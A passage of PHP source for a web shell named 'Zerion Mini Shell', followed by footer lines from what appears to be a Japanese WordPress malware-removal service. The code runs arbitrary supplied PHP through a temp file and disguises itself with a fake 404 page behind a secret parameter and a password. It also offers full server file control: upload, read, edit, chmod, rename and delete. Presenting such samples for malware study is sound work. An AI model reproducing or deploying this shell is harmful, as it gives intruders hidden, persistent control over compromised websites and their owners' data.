    $file_name = tmpfile();
    fwrite($file_name, $a);
    $require_params = stream_get_meta_data($file_name);
    @(require $require_params['uri']);
    fclose($file_name);
    die;
  }
  if (isset($_REQUEST['auth_key'])) {
    die($L7CRgr);
  }
  if (!$pass) {
    if (!isset($_REQUEST['520'])) {
      header("HTTP/1.1 404 Not Found");
      die;
    }
    echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>';
    die;
  }
  echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';
  echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : ';
  if (isset($_GET['path'])) {
    $path = $_GET['path'];
  } else {
    $path = getcwd();
  }
  $path = str_replace('\\', '/', $path);
  $paths = explode('/', $path);
  foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
      $a = true;
      echo '<a href="?path=/">/</a>';
      continue;
    }
    if ($pat == '') {
      continue;
    }
    echo '<a href="?path=';
    for ($i = 0; $i <= $id; $i++) {
      echo "{$paths[$i]}";
      if ($i != $id) {
        echo "/";
      }
    }
    echo '">' . $pat . '</a>/';
  }
  echo '</td></tr><tr><td>';
  if (isset($_POST['path_create'])) {
    if (@mkdir($path . '/' . $_POST['path_create'])) {
      echo '<font color="green">create success :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';
    } else {
      echo '<font color="red">create failed :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';
    }
  }
  if (isset($_FILES['file'])) {
    if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
      echo '<font color="green">File Ter-Upload :* </font><br />';
    } else {
      echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
 </font><br />';
    }
  }
  echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td>';
  if (isset($_GET['filesrc'])) {
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
  } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
    echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
    if ($_POST['opt'] == 'chmod') {
      if (isset($_POST['perm'])) {
        if (chmod($_POST['path'], octdec($_POST['perm']))) {
          echo '<font color="green">Change Permission Done.</font><br />';
        } else {
          echo '<font color="red">Change Permission Error.</font><br />';
        }
      }
      echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), 4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'rename') {
      if (isset($_POST['newname'])) {
        if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
          echo '<font color="green">Change Name Done.</font><br />';
        } else {
          echo '<font color="red">Change Name Error.</font><br />';
        }
        $_POST['name'] = $_POST['newname'];
      }
      echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'edit') {
      if (isset($_POST['src'])) {
        $fp = fopen($_POST['path'], 'w');
        if (fwrite($fp, $_POST['src'])) {
          echo '<font color="green">Edit File Done ~_^.</font><br />';
        } else {
          echo '<font color="red">Edit File Error ~_~.</font><br />';
        }
        fclose($fp);
      }
      echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
    }
    echo '</center>';
  } else {
    echo '</table><br /><center>';
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
      if ($_POST['type'] == 'dir') {
        if (rmdir($_POST['path'])) {
          echo '<font color="green">Delete Dir Done.</font><br />';
        } else {
          echo '<font color="red">Delete Dir Error.</font><br />';
        }
      } elseif ($_POST['type'] == 'file') {
        if (unlink($_POST['path'])) {
          echo '<font color="green">Delete File Done.</font><br />';
        } else {
          echo '<font color="red">Delete File Error.</font><br />';
        }
      }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
    foreach ($scandir as $dir) {
      if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
        continue;
      }
      echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";
      if (is_writable("{$path}/{$dir}")) {
        echo '<font color="green">';
      } elseif (!is_readable("{$path}/{$dir}")) {
        echo '<font color="red">';
      }
      echo perms("{$path}/{$dir}");
      if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
        echo '</font>';
      }
      echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach ($scandir as $file) {
      if (!is_file("{$path}/{$file}")) {
        continue;
      }
      $size = filesize("{$path}/{$file}") / 1024;
      $size = round($size, 3);
      if ($size >= 1024) {
        $size = round($size / 1024, 2) . ' MB';
      } else {
        $size .= ' KB';
      }
      echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";
      if (is_writable("{$path}/{$file}")) {
        echo '<font color="green">';
      } elseif (!is_readable("{$path}/{$file}")) {
        echo '<font color="red">';
      }
      echo perms("{$path}/{$file}");
      if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
        echo '</font>';
      }
      echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
    }
    echo '</table>
</div>';
  }
  echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>';
  function perms($file)
  {
    $perms = fileperms($file);
    if (($perms & 0xc000) == 0xc000) {
      $info = 's';
    } elseif (($perms & 0xa000) == 0xa000) {
      $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
      $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
      $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
      $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
      $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
      $info = 'p';
    } else {
      $info = 'u';
    }
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $info;
  }
}), $L6CRgr[1]);
exit;


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.